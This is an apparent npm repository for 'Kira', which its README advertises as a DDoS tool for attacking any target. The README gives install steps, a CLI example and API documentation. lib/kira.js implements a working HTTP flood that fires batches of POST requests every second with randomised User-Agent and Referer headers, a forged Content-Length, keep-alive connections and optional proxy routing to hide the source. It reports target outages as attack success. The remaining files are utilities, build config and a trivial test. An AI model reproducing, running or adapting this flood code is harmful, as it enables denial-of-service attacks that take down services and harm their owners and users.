README.md
# ![Kira](https://raw.githubusercontent.com/chrisenytc/kira/master/logo.png)

> A awesome DDoS tool for making attacks to any target

[![Build Status](https://secure.travis-ci.org/chrisenytc/kira.png?branch=master)](https://travis-ci.org/chrisenytc/kira) [![NPM version](https://badge-me.herokuapp.com/api/npm/kira.png)](http://badges.enytc.com/for/npm/kira)

## Getting Started
Install the module with: 

```bash
$ npm install -g kira
```

Example:

```javascript
var Kira = require('kira');
//Create new instance of Kira
var api = new Kira();
```

## How to use

Example of use the Kira CLI

```bash
$ kira kill http://localhost:3000 --proxy https://54.234.95.169:80
```

## Documentation

#### .kill(url, maxLimit, length, enableProxy)

**Parameter**: `url`
**Type**: `String`
**Example**: `http://example.com`


**Parameter**: `maxLimit`
**Type**: `Number`
**Example**: `200`


**Parameter**: `length`
**Type**: `Number`
**Example**: `10000`

**Parameter**: `enableProxy`
**Type**: `String`
**Example**: `https://54.234.95.169:80`


The 'kill' method is responsible for send many requests to a target

How to use this method

```javascript

api.kill('http://example.com', 200, 10000, 'https://54.234.95.169:80');
```

## Contributing

See the [CONTRIBUTING Guidelines](https://github.com/chrisenytc/kira/blob/master/CONTRIBUTING.md)

## Support
If you have any problem or suggestion please open an issue [here](https://github.com/chrisenytc/kira/issues).

## License 

The MIT License

Copyright (c) 2014, Christopher EnyTC

Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:

The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.



CHANGELOG
v0.1.1:
  date: 2015-7-25
  changes:
    - Fix random error.
v0.1.0:
  date: 2014-9-26
  changes:
    - Initial release.


test/kira_test.js
/*
 * kira
 * https://github.com/chrisenytc/kira
 *
 * Copyright (c) 2014, Christopher EnyTC
 * Licensed under the MIT license.
 */

'use strict';

var chai = require('chai');
chai.expect();
chai.should();

var Api = require('../lib/kira.js');
var api = new Api();

describe('kira module', function() {
    describe('#constructor()', function() {
        it('should be a function', function() {
            Api.should.be.a("function");
        });
    });
    describe('#instance()', function() {
        it('should be a object', function() {
            api.should.be.a("object");
        });
    });
});



Gulpfile.js
/*
 * kira
 * https://github.com/chrisenytc/kira
 *
 * Copyright (c) 2014, Christopher EnyTC
 * Licensed under the MIT license.
 */

'use strict';

var gulp = require('gulp'),
    jshint = require('gulp-jshint'),
    mocha = require('gulp-mocha'),
    stylish = require('jshint-stylish');

gulp.task('jshint', function() {
    // Minify and copy all JavaScript (except vendor scripts)
    return gulp.src(['./lib/**/*.js', './test/**/*.js'])
        .pipe(jshint())
        .pipe(jshint.reporter(stylish));
});

// Copy all static images
gulp.task('mocha', function() {
    return gulp.src('./test/*.js')
        .pipe(mocha({
            globals: ['chai'],
            timeout: 6000,
            ignoreLeaks: false,
            ui: 'bdd',
            reporter: 'spec'
        }));
});

// Rerun the task when a file changes
gulp.task('watch', function() {
    gulp.watch(['./lib/**/*.js', './test/**/*.js'], ['jshint']);
});

gulp.task('test', function() {
    gulp.run('mocha', function() {});
});

// The default task (called when you run `gulp` from cli)
gulp.task('default', ['jshint', 'mocha', 'watch']);


lib/utils.js
/*
 * kira
 * https://github.com/chrisenytc/kira
 *
 * Copyright (c) 2014, Christopher EnyTC
 * Licensed under the MIT license.
 */

'use strict';

exports.getRandomInt = function(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}

exports.uid = function(len) {
    var buf = [],
        chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',
        charlen = chars.length;

    for (var i = 0; i < len; ++i) {
        buf.push(chars[exports.getRandomInt(0, charlen - 1)]);
    }

    return buf.join('');
};

exports.uniqueToken = function() {
    //Generate
    var uid = exports.uid(16),
        uid2 = exports.uid(16),
        uid3 = exports.uid(16),
        uid4 = exports.uid(16),
        uid5 = exports.uid(16),
        uid6 = exports.uid(16),
        uid7 = exports.uid(16),
        uid8 = exports.uid(16),
        uid9 = exports.uid(16),
        uid10 = exports.uid(16),
        uid11 = exports.uid(16),
        uid12 = exports.uid(16),
        uid13 = exports.uid(16),
        uid14 = exports.uid(16),
        uid15 = exports.uid(16),
        uid16 = exports.uid(16),
        accessToken = uid16 + uid15 + uid14 + uid13 + uid12 + uid11 + uid10 + uid9 + uid8 + uid7 + uid6 + uid5 + uid4 + uid3 + uid2 + uid;
    return accessToken;
};


lib/debugger.js
/*
 * kira
 * https://github.com/chrisenytc/kira
 *
 * Copyright (c) 2014, Christopher EnyTC
 * Licensed under the MIT license.
 */

'use strict';

/*
 * Module Dependencies
 */

require('colors');


module.exports = function(msg, type) {
    switch (type) {
        case 'error':
            console.log();
            console.log(msg.bold.red);
            break;
        case 'warning':
            console.log();
            console.log(msg.bold.yellow);
            break;
        case 'info':
            console.log();
            console.log(msg.bold.cyan);
            break;
        case 'success':
            console.log();
            console.log(msg.bold.green);
            break;
        default:
            console.log();
            console.log(msg.bold);
            break;
    }
};


lib/kira.js
/*
 * kira
 * https://github.com/chrisenytc/kira
 *
 * Copyright (c) 2014, Christopher EnyTC
 * Licensed under the MIT license.
 */

'use strict';

/*
 * Module Dependencies
 */

var request = require('superagent'),
    random_ua = require('random-ua'),
    inquirer = require('inquirer'),
    pj = require('prettyjson').render,
    utils = require('./utils.js');

//Extends superagent
require('superagent-proxy')(request);

//Colors
require('colors');

/*
 * Private Methods
 */

/*
 * Public Methods
 */

/**
 * @class Kira
 *
 * @constructor
 *
 * Constructor responsible for provide api requests
 *
 * @example
 *
 *     var api = new Api();
 *
 */

var Api = module.exports = function Api() {
    //
};

/**
 * Method responsible for asking questions
 *
 * @example
 *
 *     api.prompt(prompts, cb);
 *
 * @method prompt
 * @public
 * @param {Object} prompts Array of prompt options
 * @param {Function} cb A callback
 */

Api.prototype.prompt = function prompt(prompts, cb) {
    inquirer.prompt(prompts, function(answers) {
        cb(answers);
    });
};

/**
 * Method responsible for send many requests to a target
 *
 * @example
 *
 *     api.kill('http://example.com', 200, 10000, 'https://54.234.95.169:80');
 *
 * @method kill
 * @public
 * @param {String} url Url of a target
 * @param {Number} maxLimit Maximum Connections
 * @param {Number} length Content length
 * @param {String} enableProxy Proxy address
 */

Api.prototype.kill = function kill(url, maxLimit, length, enableProxy) {
    var that = this;

    function attack() {
        for (var i = 0; i < maxLimit; i++) {
            if (enableProxy) {
                //Proxy Data
                var proxyData = that.getProxy(enableProxy);
                //Send request
                request
                    .post(url)
                    .set('User-Agent', random_ua.generate())
                    .set('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
                    .set('Referer', that.getReferer())
                    .set('Content-Length', length)
                    .set('Connection', 'keep-alive')
                    .proxy(proxyData)
                    .end(function(err, res) {
                        if (err) {
                            console.log('<------------------------------------------------>');
                            if (err.code === 'ECONNREFUSED' || err.code === 'ECONNRESET') {
                                console.log('[ ' + 'SUCCESS'.green.bold + ' ] =====>');
                            } else {
                                console.log('[ ' + 'WAITING'.yellow.bold + ' ] =====>');
                            }
                            console.log('  Target => ' + url.red);
                            console.log('  WorkerID => ' + utils.uid(8));
                            if (err.code === 'ECONNREFUSED') {
                                console.log('  Target Status => ' + 'OFFLINE'.red.bold);
                                console.log('  Attack Status => ' + 'SUCCESS'.green.bold);
                            }
                            if(err.code === 'ECONNRESET') {
                                console.log('  Target Status => ' + 'UNAVAILABLE'.red.bold);
                                console.log('  Attack Status => ' + 'SUCCESS'.green.bold);
                            }
                            console.log();
                            if (err.code !== 'ECONNREFUSED' && err.code !== 'ECONNRESET') {
                                console.log(pj(err));
                            }
                            console.log('<------------------------------------------------>');
                            return;
                        }
                        console.log();
                        console.log('[ ' + 'ATTACKING'.yellow.bold + ' ] =====>');
                        console.log('  Using proxy => ' + proxyData.white.bold);
                        console.log('  Attack to => ' + url.yellow);
                        console.log('  WORKER ID => ' + utils.uid(8));
                        console.log('  Target Status => ' + res.statusCode.toString().green.bold);
                        console.log('  Attack Status => ' + 'RECEIVED'.green.bold);
                        console.log();
                        console.log(pj(res.header));
                        console.log('<------------------------------------------------------>');
                    });
            } else {
                request
                    .post(url)
                    .set('User-Agent', random_ua.generate())
                    .set('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
                    .set('Referer', that.getReferer())
                    .set('Content-Length', length)
                    .set('Connection', 'keep-alive')
                    .end(function(err, res) {
                        if (err) {
                            console.log('<------------------------------------------------>');
                            if (err.code === 'ECONNREFUSED' || err.code === 'ECONNRESET') {
                                console.log('[ ' + 'SUCCESS'.green.bold + ' ] =====>');
                            } else {
                                console.log('[ ' + 'WAITING'.yellow.bold + ' ] =====>');
                            }
                            console.log('  Target => ' + url.red);
                            console.log('  WorkerID => ' + utils.uid(8));
                            if (err.code === 'ECONNREFUSED') {
                                console.log('  Target Status => ' + 'OFFLINE'.red.bold);
                                console.log('  Attack Status => ' + 'SUCCESS'.green.bold);
                            }
                            if(err.code === 'ECONNRESET') {
                                console.log('  Target Status => ' + 'UNAVAILABLE'.red.bold);
                                console.log('  Attack Status => ' + 'SUCCESS'.green.bold);
                            }
                            console.log();
                            if (err.code !== 'ECONNREFUSED' && err.code !== 'ECONNRESET') {
                                console.log(pj(err));
                            }
                            console.log('<------------------------------------------------>');
                            return;
                        }
                        console.log();
                        console.log('[ ' + 'ATTACKING'.yellow.bold + ' ] =====>');
                        console.log('  Attack to => ' + url.yellow);
                        console.log('  WORKER ID => ' + utils.uid(8));
                        console.log('  Target Status => ' + res.statusCode.toString().green.bold);
                        console.log('  Attack Status => ' + 'RECEIVED'.green.bold);
                        console.log();
                        console.log(pj(res.header));
                        console.log('<------------------------------------------------------>');
                    });
            }
        };
    }

    //Start Killer
    var killer = setInterval(attack, 1000);
};

/**
 * Method responsible for get random proxy address
 *
 * @example
 *
 *     api.getProxy();
 *
 * @method getProxy
 * @public
 * @param {String} address Proxy address
 */

Api.prototype.getProxy = function getProxy(address) {
    return address;
};

/**
 * Method responsible for get random referers
 *
 * @example
 *
 *     api.getReferer();
 *
 * @method getReferer
 * @public
 */

Api.prototype.getReferer = function getReferer() {
    return [
        'https://www.google.com/search?q=' + utils.uid(8),
        'https://' + utils.uniqueToken() + '.com',
        'https://' + utils.uniqueToken() + '.net',
        'https://' + utils.uniqueToken() + '.org',
        'https://' + utils.uniqueToken() + '.me',
        'https://' + utils.uniqueToken() + '.io',
        'https://' + utils.uniqueToken() + '.io',
        'https://' + utils.uniqueToken() + '.la',
        'https://' + utils.uniqueToken() + '.asia',
        'https://' + utils.uniqueToken() + '.tc',
        'https://' + utils.uniqueToken() + '.gl',
        'https://' + utils.uniqueToken() + '.uk',
        'https://' + utils.uniqueToken() + '.tk'
    ][utils.getRandomInt(0, 12)];
};
